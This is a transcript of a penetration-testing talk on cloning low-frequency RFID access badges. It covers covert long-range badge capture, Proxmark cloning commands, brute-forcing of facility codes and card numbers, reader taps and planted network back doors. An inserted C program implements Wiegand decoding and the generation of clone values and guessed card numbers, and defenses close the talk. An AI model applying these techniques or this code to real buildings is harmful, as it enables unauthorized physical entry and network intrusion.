Welcome, everybody, to RFID Hacking: Live Free or RFID Hard. My name is Fran Brown. I'm a managing partner at Bishop Fox. We just rebranded, and I've got some exciting stuff to show you guys here today. I'm just going to get right into it. Basically, what I want to go over today is practical advice on successfully performing a penetration test of an RFID physical security system. A little bit of background behind this. About a year ago I was doing an assessment of an electric utility, and I needed to get to their SCADA network, which was only accessible from two buildings. So I needed to break into a building. That was my goal. So I started looking into, you know, different RFID presentations that have been given in the past. Unfortunately there was no Hacking Exposed RFID that just let me know what I would need to know to be able to break into a building. So I watched all the past presentations I could find, anything I could find. And after a couple of days I realized I was no closer to achieving my objective than I was when I started. Most of the presentations in the past discussed tools that weren't released or were more theoretical. They didn't give me exactly what I needed to know to be able to break into a building. So that's what I hope to cover here today. And I'm going to finish up with practical defenses as well, so you know how to protect yourself. So breaking it down, it's a pretty simple methodology. When I want to do an RFID penetration test, it just boils down to three simple steps. First, steal somebody's badge information without them realizing it while walking by them. Two, take that information and make a clone of their card. And three, go into the building that I want to break into and possibly plant a back door so I don't have to stay there very long. Seems pretty simple.
But the thing that I soon realized was that step one was a little bit difficult, because most of the tools out there required you to get within a couple of centimeters to be able to successfully steal someone's badge information out of their pocket or purse or what have you. So that kind of led to what I like to call the ass-grabbing method of RFID hacking. These are all from different presentations, YouTube videos, things I've seen in the past, where the people go on and on about how insecure it is and how easy it is to steal somebody's badge information, and then they have things like this, where they're walking up and grabbing people's asses with a Proxmark run down their sleeve with a big CD-sized antenna and, you know, walking around ass-grabbing. You see Jonathan Westhues up there. I don't know how many times you could potentially do that, walk around at a target facility and start grab-assing before you actually get caught. I imagine maybe once or twice. So this wasn't a realistic thing for me. This isn't going to work. I wasn't sure what I could do at this point, but there weren't really any tools out there that would allow me to realistically pull this type of attack off. So I started looking into my own custom solutions, and with that I'm going to do a couple of quick videos that I think demonstrate the limitations as well as our tools for step one there, the stealing, and for making a clone of a card, just to show how easy it is now to be able to pull this off and steal someone's badge number and then break into a building. So can you guys see that okay? So in this first one, this is kind of demonstrating... how many of you are familiar with the Proxmark 3? It's probably the number one tool you could buy. It's actually really great for a lot of purposes. Sorry about that, it's too much for the microphone. But as you'll see here, it also has the problem of distance. This is the Proxmark.
This is an RFID hacking tool you could buy, by far the most popular. We have it plugged into my laptop here via USB, and then via another cable there's the antenna. And we see that right now we are running the Proxmark and we have it in listening mode. It's trying to read right now. So as we can see, it still does not see the card even at this range. So I'll keep going down, keep going down, getting closer to the antenna. Closer still, until there we go: 6339. We had to be within probably about an inch right here before it actually starts picking up the badge information. 6339. So this is about how close you have to get to somebody, on their person, to be able to effectively use this tool to steal their information. Which is a little too close for comfort, if you ask me. So, I mean, how many people here have pulled off successful penetration tests with the Proxmark or whatever existing tools are out there? A handful of people? I guess you could, but you saw the antenna, and it's about the size of a CD, and typically people would run it down their sleeve, have the CD, and try to go up and guess where the person has their badge on them to begin with, if you don't know which pocket it is, and start feeling around. So I saw a few things where people posted custom solutions that they had done. They didn't really release code or practical advice on how to put it together. So I kind of had to do my own thing. It will be up on the website tomorrow, but my goal here was to create a tool so that security professionals who don't know a lot about RFID, or don't have an electrical engineering background, or aren't going to build their own custom antennas, your average security professional who wants to be able to perform this kind of pen test, can get up and running realistically quickly. So it would be great if there was a tool that took that step one and allowed us to secretly steal this information without having to go up and grab somebody's butt.
So, as a crazy random happenstance, we do have such a tool. 6339 again. We look to my left here. This is what I'm calling the Tastic Long Range RFID Stealer, from my company Bishop Fox, and we see it's just a weaponized commercial reader. So we'll go ahead and throw that up there, and you can see it's a 26-bit card. And again, facility code 113 and card number 6339. So it outputs it to the screen nicely as well. I'm clearly a few feet away right now. And with this, I can steal the information without having to go up and grab somebody's butt. So, taking a little quicker look at what this tool is actually doing and how the circuit board comes into play. I'm going to turn this off, and we can see that it is about a foot by a foot and only an inch deep. Extremely light, portable. It has a missile switch on the back here, which I was using to not accidentally turn it on, things like that. It's completely self-powered and portable. So what you would do is take this, put it in your messenger bag or backpack or briefcase, walk around with it, walk by somebody from up to three feet away, and pick up their badge information, which is much better than grabbing butts up here. Now it does write to the screen, but we actually see it's easy to take apart here. Just a single screw in the front, a thumb screw that I can just twist out, and take the lid off. And what we have here is a long-distance commercial badge reader. The kind you would find in parking lots so that you don't have to get out of your car. You can just roll down your window, reach your arm out of the car window and hold your badge out, and get it picked up. So it's meant to be picked up from several feet away. All of this was in here to begin with. All I did was add the LCD screen and the batteries to self-power it, and you will recognize this circuit board here, which you'll have without all of the things I already installed.
But it has all the logic. The code behind it will be on our website for you to download as well, and this is just an Arduino controller that you can buy online on Amazon or at Radio Shack, as well as just some resistors and a few things there you can pick up anywhere. We have detailed instructions on the website on how to recreate this, which is our main goal here. And finally we see we have a micro SD card, so not only was it writing it to the screen, it was actually writing it to the SD card in a cards.txt file. So, pretty cool. Basically, for those who are really attached to it, the ass-grabbing methodology is still at your disposal if that's what you want to do. But this, I think, is a much better solution. And as you can see it's super light, it's self-powered, completely portable. Picks it up from a couple of feet away as opposed to a centimeter or two. And yes, so effectively this was my attempt at solving step one of those three steps. And then I just have one more video which shows you step two. As I mentioned, I like the Proxmark for a lot of things. But this is your micro SD card, the output of it. I'm just going to pop it into my laptop; it should come up over here. So we should see the SD card came up that I pulled from our long-range RFID Stealer. Check that out, and we see that there's a single file, cards.txt, just a simple text file. Click on that. And we see here we scanned it a few times; it's a 26-bit card. Here is the hexadecimal notation for that badge information. We actually decode it for you: it's facility code 113 and badge number 6339, as we saw printed on the card. And we actually have the binary as well. So now we've successfully completed step one. We've taken this silent stealing of badge information and made it a realistic possibility, where from three feet away we can casually walk by you and steal the information. Now that we have that, we can use tools like the Proxmark to quickly create a clone, a fake version of your badge, so that we can go use it.
And that is extremely easy; it's a single command. We already have the Proxmark set up here. So what we're going to do is, I'm going to go ahead and copy the hexadecimal version of this badge, 6339. Click copy. And we're going to come back to our Proxmark here. Now the Proxmark is in read mode right now, so by hitting this button I'll stop that. So now we have the badge information from our tool, just this hexadecimal value. And what we're going to do is take this programmable T5577 card, which is a programmable card that doesn't read as anything right now. And we can turn this... this is just a sticky note. It's clearly not the 6339 badge. Let's put a post-it on there. It's programmable. So I just lay that on top of the antenna here. And if we look right here, all I'm going to do is type in lf, for low frequency, hid, for HID card, clone, space, and then I'm just going to paste in that value we took from our cards.txt file. And click there. And we see "cloning tag with" that value that we stole, done. So right now this card is functionally an exact duplicate of the card that we stole, 6339. So let's test it out. So we have our original again, badge number 6339. There's our original card, 6339, and it's a ProxCard II. Go over here. 6339 still. Now we take our clone card, this card, which is clearly not that same card. It has, I think, Korean writing on there. And we go up to it. Badge 6339. Facility code 113, 26-bit card. So now we've successfully stolen and made a fake copy of this person's badge. Cool. So pretty easy now, right? Hopefully you guys can get up and running with this kind of tool. And at this point I've been able to train some of our consultants to do it now in about 10 minutes. Here's the on switch, which is also the off switch, on the back. You know, go forth and prosper. So with that, what we're talking about here is low frequency.
I saw with some of the articles that came out, people were posting links to high-frequency long-range antennas and things like that. But we're talking about the 125 kilohertz low-frequency technology for physical security systems. And looking at that, people have known about these issues for quite some time. But the interesting thing to me was that no one's really done anything about it yet. This came from HID Global directly, from a post they had recently, saying that 70 to 80 percent of physical security systems out there still use this legacy low-frequency technology that we're exploiting here. Despite us having known for quite some time, and they admit that, you know, there's no security. They've been hacked. We know this. They're not resistant to any of these kinds of common attacks, yet they still persist. And just looking at that, one of the motivations behind doing this talk, actually after creating the tools, was I noticed that, you know, we see in Chris Paget's talk from 2007, you know, it couldn't be any simpler. If you're using this technology for your doors, you're highly insecure. I mean, it's a big bullet. That's it. That's 2007. And those quotes came from this blog post in June of 2013. So from 2007 to 2013, we've made about zero progress in terms of upgrading these physical security systems. And that blog post is actually pretty interesting and goes on to talk about some other reasons why. The physical security product life cycle is about 20 years, they estimate. So most of the things out there were bought in the early 90s. HID offers more secure solutions, but people, you know, bought and installed products from 20 years ago and are just more than happy with them. So to some extent, it's ignorance on the part of the people making the purchase decisions. They just don't realize that these things are this insecure, as well as there being budget issues. So what we're looking at here is a basic breakdown of what's happening in a badging system for a door.
There are four main components. And coincidentally, if we're thinking about doing a pen test, those are the four areas that we'll want to target. So with this attack, we're targeting the card directly. We're going to the local Starbucks in the building we want to break into, or hanging out in the smoking area or something like that, and targeting the cards that are on somebody's person. These cards, basically, when they come within near distance of a reader like this, the reader powers it and it just starts singing out 26 to 37 ones and zeros. That's it. As soon as it gets powered, it just starts singing this out, depending on what they have. And then the reader just reads these off the air, encodes them in the Wiegand protocol, which I'll talk about a little bit, and just forwards them on to the controller to make the decision about whether to open the door or not. And then you have the host PC, where a physical security guard will be sitting to add new users and monitor cameras and things like that. So in breaking this down and doing this initial research, it was like pulling teeth. I mean, just trying to understand what was going on with these things. What's written on the card? How far away can I be? Every question that would jump to your mind, if you didn't know anything about RFID hacking, it would be like the 130th Google hit or some random product manual that I found the answer in. So I tried to compile as much as I could here to make it easy. But one of the questions that comes up is, if I saw somebody's badge, if I looked at the number on the back, is that enough information for me to make a fake copy of it? You know, if you went on Google Images and somebody took a picture and you saw their badge number, you know, could you make a copy of that? Well, the short answer is maybe. So basically those 26 to 37 ones and zeros that the card sings out when it comes to your reader eventually get interpreted by a controller.
And the way they get interpreted is basically what they call the card format, which typically breaks down into your card ID and a facility code. What's written on the card is the card ID, which is part of what you need. If they're using a standard 26-bit card, then there's only 255 possible facility codes. So technically with that, I could just try that card number and facility code one, facility code two, facility code three, and pretty quickly be able to brute force it based on what you visually see on the card. If they implemented something like a 35-bit card, then it wouldn't be as easy to do. There's also... you'll typically see on these cards one number, and then a space, and then a longer number. That longer number is just a sales order number. I found it in a product manual. If you want to buy more cards, when you call the sales guy you read them that number. It has nothing to do with authentication or getting you in the door or anything like that. So, good to know. And this is what I'm talking about with the... So in reading this as well, I saw things from your standard 26-bit card to your corporate 35-bit card. And then you hear that they're 44-bit cards. And then in the Proxmark, you typically see, when tools access them, 10 hexadecimal digits, which is only 40 bits. So what exactly was going on with the card was a little confusing to me, because people didn't really make it clear. So just to make it clear what's actually going on: it sings out 26 to 37 bits in the air. It's always 44 bits on the card. And when we see here... I just grabbed this from a product manual and put the notation there myself. Typically... always, the first hexadecimal digit will be a zero, which usually gets dropped, which is why you see it as 10. You see the full version there of 11 hexadecimal digits starting with a zero. So what happens is there are always 44 bits on the card, which you see up there. The standard 26-bit is what you see on the right.
And then there... It starts... Everyone look at that guy with the stare. So it's always... Every single card, it starts with six zeros and a one. Every single card. Six zeros and a one. And then there's a buffer of 10 zeros, and then a parity or sentinel bit, and then your 26 bits. So if you have a 35-bit card, or anything up to 37, all it does is extend to the left there, using that buffer of 10 zeros. And that's the full 44 bits that are on the card. So, mystery solved. This is on low-frequency stuff and mainly for breaking into buildings. But this type of attack and the techniques that we're going for here are only going to become more applicable as we go on. We're starting to see them in credit cards in the U.S. now, passports, and my favorite: who here is a Disney fan? Anybody, Disneyland, Disney World? Yeah, so Disney is going over to RFID for everything. So it's going to be fun experiments, some field research, get some FastPasses to get to the front of the lines and things like that. See the band there on somebody's wrist. Everything from getting in the front door of Disney World to getting your FastPasses for the rides, to paying for things, to your hotel room, are all going to be... it's all RFID based. They're rolling it out right now. So these things are just, you know, people are finding more and more uses for RFID technology that are going to be fun to do pentests on. A couple of the tools that you want to have in your arsenal besides our tool here: I would definitely recommend the Proxmark. You can get cheaper versions, but the nice version is $399. You can use it, as we saw in the one video, for making clone cards. It has all kinds of purposes that are great for doing RFID hacking. It does have a single button on it. See that workflow there? One crazy workflow for the single button on top of the Proxmark, which is a little fun.
It's like standing on one foot and holding the button for four and a half seconds until it blinks red and orange, and then hold it longer. That's literally the one button's workflow, which is pretty cool. Another cool thing with the Proxmark is there's a tool called ProxBrute. Have any of you guys heard of ProxBrute before? So ProxBrute is just custom firmware that someone from McAfee, Brad, released that you can load onto the Proxmark and use to do brute forcing. Each of these badges, we saw the card number and facility code. Once you have a valid badge, if you stole maybe just a normal worker's badge information to get in the front door, but you want to get into the data center and that person didn't have access... well, the card numbers themselves are sequential. So you could use this tool, and the Proxmark will simulate being a badge, and it will try that number, the next badge number, the next badge number. So it will allow you to brute force a different badge number to get into a data center or a more secure area than the actual badge that you stole, which is great. And it has a similar crazy workflow for that one button, which is up there. Just see. Also, there's Adam Laurie's stuff, the RFID scripts. So Adam Laurie's done a bunch of talks and over time has compiled a bunch of different Python scripts for doing RFID hacking. And he just keeps adding to them, for all sorts of different purposes. So I definitely recommend checking that out. As well, one convenience is that the software all comes loaded on BackTrack. So all you need to do is get the equipment, plug the USB in, fire up BackTrack, and you could be up and running and doing some stuff pretty quickly. These are extremely cool. Has anyone seen these tools before, from RF IDeas? I don't typically... I don't think I've ever seen this in a security presentation on RFID. I happened to stumble across it. And basically it's just two little USB sticks about that size.
It requires no software. It's for field testing, for people that install this type of equipment. And basically, one of the questions that I had, that I wanted to answer, was: what if I don't know what kind of card this is? What if I don't know what technology it's using? Take the Disney example. The Disney stuff doesn't have identifying... it has all Walt Disney stuff on their cards. It doesn't say what kind of card it actually is. So if I wanted to figure out what technology it was, I would use these things. There's a high-frequency and a low-frequency little USB stick. You plug it in, you open up Notepad, you lay a card on top of it and click Print Screen. And in Notepad it will tell you not only what the badge information is, but exactly what technology it is. Which matters for being able to understand what kind of tools you're going to need to break into it. So, pretty cool. And then again, this is our tool again, which we just saw the demonstration of already. I programmed it in there; you see a 35-bit card. Basically you'll be able to get one of those circuit boards I'm about to give out, or go to our website, which should be up tomorrow, download the code that you can send away to anyone that makes circuit boards, and for about 30 bucks they'll send you a copy. Then you buy the parts that you need, load the code that we have, which will be on our website, and be up and running. You can essentially plug this into any RFID reader there is, for any of the technologies. So as we'll see, a simple missile switch in the back, easily from three feet away. I designed it, what I'll be releasing, in Fritzing. How many of you guys are familiar with Fritzing? Anybody play around with it? I'll be releasing that, and you can actually export it to Extended Gerber to send away to actually get the board. That's a picture of the board that I'll be giving away after the talk.
And essentially you could take this board, and it just basically has two inputs and two outputs. It's taking in the output of a reader, like this one here, it's taking in the batteries, and it's outputting the badge number to a screen and to a text file on the card. That's as simple as you can think of how the board is working. And it's tapping that output of the reader, this Wiegand output that I mentioned earlier, which every single badge reader has, and they typically use. So those 26 to 37 ones and zeros: basically there's data one and data zero. For each one it sends a pulse on data one; for each zero it sends a pulse on data zero. And we're just tapping into that. So essentially you could use this for any type of badge system. So the two main ones for physical security are HID Prox and Indala Prox for low frequency, which technically are both owned by the company HID at this point. But if I held an HID badge up to an Indala reader it wouldn't do anything, or if I held an Indala card up to an HID reader it wouldn't do anything. So between these two long-distance readers, one of which you see here, you're pretty much covered for 99% of the badges that people would have out there. So you could take my board, plug it into the HID reader, which we have here, and if you notice it's not working, you could plug it into the long-distance Indala reader and just walk around and grab people's Indala cards as well. You see "proven secure" is written there for Indala. Indala claims to be more secure, and they have a lot of people convinced that it is. Instead of just singing out the ones and zeros it does a little bit of obfuscation, which doesn't even matter, because if we're using an actual Indala reader, like we are, it does all the decoding for you. So it's very easy to do, and we've made fake versions, and so both of these are just as susceptible.
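The pieces described above (the Wiegand data-zero/data-one pulses the board taps, the 26-bit facility-code/card-number format, the 44-bit layout the Proxmark shows as 10 hex digits, the facility-code guessing from a number read off a badge, and ProxBrute-style sequential card numbers) fit together in a few dozen lines. The following is an added example written for this page; it is not the Bishop Fox Tastic code, ProxBrute, or Proxmark source. It is plain C so it compiles both on a PC and as the core of an Arduino sketch. The pulse feed, the function names, and the 44-bit packing for formats other than 26-bit (which simply moves the sentinel bit to the left, as the talk describes) are assumptions; the sample pulse stream is constructed here for facility code 113, card 6339.

```c
/* Wiegand tap -> 26-bit decode/encode -> 44-bit HID Prox value (added example).
 * 26-bit frame: [even parity][8-bit facility][16-bit card][odd parity], MSB first.
 * 44-bit Prox value (as shown by Proxmark): 0000001 | ten zeros | sentinel 1 | frame. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Receiver state. A pulse on DATA0 is a 0 bit, a pulse on DATA1 is a 1 bit.
 * On the Arduino, wiegand_pulse() is what the two falling-edge interrupt
 * handlers on the reader's D0 and D1 lines would call (assumed wiring). */
typedef struct { uint64_t bits; unsigned count; } wiegand_rx;

static void wiegand_reset(wiegand_rx *rx) { rx->bits = 0; rx->count = 0; }

static void wiegand_pulse(wiegand_rx *rx, int bit) {
    if (rx->count >= 64) return;                 /* drop anything past 64 bits */
    rx->bits = (rx->bits << 1) | (uint64_t)(bit & 1);
    rx->count++;
}

/* 1 when v has an odd number of set bits */
static int parity(uint32_t v) { int p = 0; while (v) { p ^= (int)(v & 1); v >>= 1; } return p; }

typedef struct { uint8_t facility; uint16_t card; } badge;

/* Decode a 26-bit frame; false if either parity bit is wrong (a bad tap). */
static bool decode_h10301(uint32_t w26, badge *out) {
    uint32_t data = (w26 >> 1) & 0xFFFFFF;          /* 8-bit FC + 16-bit CN */
    int ep = (int)((w26 >> 25) & 1), op = (int)(w26 & 1);
    if (parity(data >> 12) != ep) return false;       /* even parity, first 12 data bits */
    if ((parity(data & 0xFFF) ^ op) != 1) return false; /* odd parity, last 12 data bits */
    out->facility = (uint8_t)(data >> 16);
    out->card = (uint16_t)(data & 0xFFFF);
    return true;
}

static uint32_t encode_h10301(uint8_t facility, uint16_t card) {
    uint32_t data = ((uint32_t)facility << 16) | card;
    uint32_t ep = (uint32_t)parity(data >> 12);
    uint32_t op = (uint32_t)parity(data & 0xFFF) ^ 1u;
    return (ep << 25) | (data << 1) | op;
}

/* Pack an nbits-wide frame into the 44-bit value used by "lf hid clone".
 * For 26-bit cards the sentinel sits at bit 26; longer formats extend left. */
static uint64_t hid_prox_44(uint32_t frame, unsigned nbits) {
    return (1ULL << 37) | (1ULL << nbits) | frame;
}

/* Card number read off the back of a badge: one candidate per 8-bit facility code. */
static void candidates_for_card(uint16_t card, uint64_t out[256]) {
    for (unsigned fc = 0; fc < 256; fc++)
        out[fc] = hid_prox_44(encode_h10301((uint8_t)fc, card), 26);
}

/* ProxBrute-style guess: same facility code, next sequential card number. */
static uint32_t next_card(uint32_t w26) {
    badge b;
    if (!decode_h10301(w26, &b)) return 0;
    return encode_h10301(b.facility, (uint16_t)(b.card + 1));
}

/* Constructed input: the 26 D0/D1 pulses a reader would emit for FC 113, card 6339. */
static uint32_t feed_example_pulses(wiegand_rx *rx) {
    uint32_t w = encode_h10301(113, 6339);
    wiegand_reset(rx);
    for (int i = 25; i >= 0; i--) wiegand_pulse(rx, (int)((w >> i) & 1));
    return (uint32_t)rx->bits;
}

int main(void) {
    wiegand_rx rx; badge b;
    uint32_t w = feed_example_pulses(&rx);
    if (rx.count == 26 && decode_h10301(w, &b))
        printf("26-bit card: FC %u card %u -> lf hid clone %010llX\n",
               b.facility, b.card, (unsigned long long)hid_prox_44(w, 26));
    return 0;
}
```

The printed value, 2006E23186, is the 10-hex-digit form the talk refers to: the leading 0 of the 11-digit 44-bit value is dropped, the "2" is the six-zeros-and-a-one header, and the even parity bit of this particular card is what turns the common "2004" prefix into "2006". The parity checks are worth keeping in a real tap, since a noisy D0/D1 line produces frames that look plausible but will never open a door.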
And finally I just plugged in, with the Arduino, an SD card, and I'm writing it to a text file for ease, but there are plenty of Arduino add-ons that you can imagine. When we play around with what to add next: from adding Bluetooth capabilities, so I could see the badges on my phone as they're being read, or even cell phone capability, to have it text message me every badge that it sees if I leave it somewhere else. These things would be relatively easy to add on to this type of technology. Drop no eaves, Mr. Gandalf. Basically, if you guys are aware of any tools that do this attack, you can let me know. I've heard people talk about it in theory and in some PhD papers, but the distance limitation, the three feet that we're now getting, and the centimeters before, is due to powering the card, not actually reading the ones and zeros that it's singing out. So people have talked about, if you leave something near the front door of an actual building and you let the real reader of that door power their card, you can listen for those ones and zeros from further away. And I know in Chris Paget's talk he had mentioned being able to get up to ten feet with this, in this passive mode, letting someone else power it. This tool obviously never was released, due to legal reasons I believe, and I haven't seen any tools that actually successfully do it, but it is something to be aware of in terms of getting further distance still. For copying the card, I mentioned this in the video, the ones which you would want to get are these T55x7 cards. They're all like a dollar; you could buy them online.
Oh, just a note: all these slides, my notes sections are like white papers; links to everything you would want for each topic are in there, and I'll have links to where you buy these. But these things are not blank cards; they're programmable cards, so they'll simulate the data and behavior of any type of card. And what I meant when I mentioned an HID card wouldn't work with Indala and an Indala card wouldn't work with HID: these cards can behave like an Indala card or they can behave like an HID card. So they could simulate any type of card and the data on them. So, I mean, they're definitely something you want to have in your arsenal too. You can reprogram them as much as you want to be your fake versions of cards. Finally, if people start, you know, using RFID-blocking wallets and stuff like that, we've got to move down the line of what we're attacking. There are things out there where you can, you know, pop open the lid of the reader and start dumping things off the readers and attack them directly. There's a man-in-the-middle tool called Gecko, where you plug it into the reader, and as people badge in it's writing them all to something as well. And I didn't really design my circuit board to be used in that way, but I realized afterwards, with a few minor alterations, you could use that circuit board. All I'm doing is tapping into the output of a real reader. You could take that circuit board, go to the front of a building that you're trying to break into, pop the lid off, insert it and have it sit there, you know, and record all the other real badges that are coming through that reader. So you could use it in this way as well. And Brad, I'll butcher his last name, Antoniewicz, from McAfee, the guy that actually made that ProxBrute software I'm talking about, he has a project here that you can see where he's come up with tons of scripts and things to attack the readers and attack the controllers directly, which are pretty cool. I would recommend checking it out. Lastly, once you get in, you want to
not be in the building any longer than you have to be. So I recommend, if you're familiar with it, the Pwn Plug. It's cool. So it's just going to be your little personal VPN, your back door into their network. It's a thousand dollars for the regular Pwn Plug and fifteen hundred for the Power Pwn. It's pretty cool looking. It's a little hefty. I would recommend... a lot of people are coming out with images for the Raspberry Pi that allow them to effectively do the same exact thing, even from Pwnie Express, the people that make the Pwn Plug: the Raspberry Pwn, the Rogue Pi, the Pwn Pi. So for thirty-five dollars, instead of fifteen hundred dollars, you can create your own little back door to be on the network. And you see there, people use, you know, hollowed-out old laptop chargers, things like that, with a Raspberry Pi in it, to be their little back door, which is pretty cool. I think we're just about out of time, so I'm going to skip... The defenses: avoid being probed. I don't know if this will help you out or not, but it's very fashionable. So I would recommend upgrading your systems, if possible, to the contactless smart cards, the high-frequency stuff. These things can do challenge-response authentication and encryption. There are more secure products out there. If you're a company that has a hundred thousand employees, replacing everybody's badges and, you know, every single door out there might not be that realistic, at least in any kind of good time frame. So in order to get around that, what I would recommend is, you know, using things like anomaly detection software, so that if I badge in at eight in the morning every morning but all of a sudden I'm badging in at four in the morning in a building I never go to, you can have it, you know, generate an alert and flag you. Also you have the protective sleeves, that I'll talk about more in a second, but you want to not wear your badge in prominent view, so I can't make a realistic-looking picture of it; security screws that prevent people from easily
popping the lid off the reader on your door instead of just normal screws; and there are also some readers that ship with tamper-detect mechanisms that will send an alert if someone's messing with the reader. And then finally, the last slide is that those protective sleeves that you would get, some of them work and some of them don't. So before you buy a hundred thousand of them for your employees, make sure that it works. This is a green card protective sleeve. One of our employees is from Scotland, very charming fellow, and he has this green card, which has RFID in it, and has this sleeve that you should keep it in at all times to prevent communication with your card. It doesn't work at all. It might as well just be a piece of paper. So I don't know how they got away with selling that to the federal government for every single green card, but it doesn't work at all. And in my experience there's no rhyme or reason; it's about half of them work, half of them don't. So get a sample, test it out before you buy them in bulk for your company. And that's it.